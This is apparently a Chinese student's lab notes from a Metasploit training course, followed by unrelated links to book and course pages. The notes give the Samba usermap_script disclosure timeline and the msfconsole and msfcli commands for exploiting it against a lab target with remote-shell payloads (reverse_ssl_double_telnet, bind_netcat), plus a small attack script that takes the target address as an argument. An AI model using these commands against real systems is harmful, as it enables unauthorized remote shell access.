1.搜尋samba服務usermap_script安全漏洞相關資訊
根據下面的連線,搜尋到如下內容:
the time line is as follows:該漏洞的生命週期圖,不會,略過* may 7, 2007: initial defect disclosure to the [email protected]
email alias.
* may 7, 2007: initial developer response by samba
developer gerald carter.
* may 9, 2007: patch released by samba developer jeremy
allison to idefense for testing.
* may 10, announcement to vendor-sec mailing list
* may 14, 2007: public announcement of the security issue.
2.msfconsole 更新apt-get update
metasploit攻擊模組路徑:
dpkg -s metasploit
kali:/usr/share/metasploit-framework/modules/exploits
bt5:/opt/framework3/msf3/modules/exploits
linuxshell 統計針對windows2000 windowsxp。。。。目標環境的攻擊模組數量(不知道)3.執行metasploit完成對linux靶機usermap_script攻擊
kali: msfconsole
msf>show exploits
msf>use exploit/multi/samba/usermap_script
msf> use exploit/multi/samba/usermap_script嘗試使用vnc圖形化遠端控制工具的攻擊載荷msf>show options
msf> set rhost
192.168.213.133
msf> exploit
我的做法:
msf exploit(usermap_script) > show payloads
msf exploit(usermap_script) > set payloads cmd/unix/reverse_ssl_double_telnet
msf exploit(usermap_script) > exploits
攻擊失敗了,但是流程應該是這樣的????求解答
4.msfcli -h
msfconsole
msf>show payloads
msf>vim 1.attack.sh
msfcli multi/samba/usermap_script payload=/cmd/unix/bind_netcat rhost=$1 e
msf>sh 1.attack.sh 192.168.213.133
Metasploit滲透測試魔鬼訓練營
首本中文原創metasploit滲透測試著作,國內資訊保安領域布道者和資深metasploit滲透測試專家領銜撰寫,極具權威性。以實踐為導向,既詳細講解了metasploit滲透測試的技術 流程 方法和技巧,又深刻闡釋了滲透測試平台背後蘊含的思想。本書是metasploit滲透測試領域難得的經典佳作...
python魔鬼訓練營作業 python魔鬼訓練營
本課程主要針對python常用的一些知識點,疑難點進行拆分並單獨講解 每乙個課程都會對具體的知識點先進行學習,然後在舉乙個具體的例子來實踐當次課程的內容 使得每乙個知識點都可以更加牢固的掌握。本課程的內容包括從python基礎 python的表示式 資料結構等基礎知識,還包括迭代器 包裝器等高階功能...
暑期七天魔鬼訓練營
第一天 1 luogu 2871 poj3624 charm bracelet 手鍊 01揹包 狀態壓縮 2 poj 1384 piggy bank 完全揹包 3 poj 2387 the cows come home 最短路徑模板 4 poj 3255 次短路 5 poj 3723 conscri...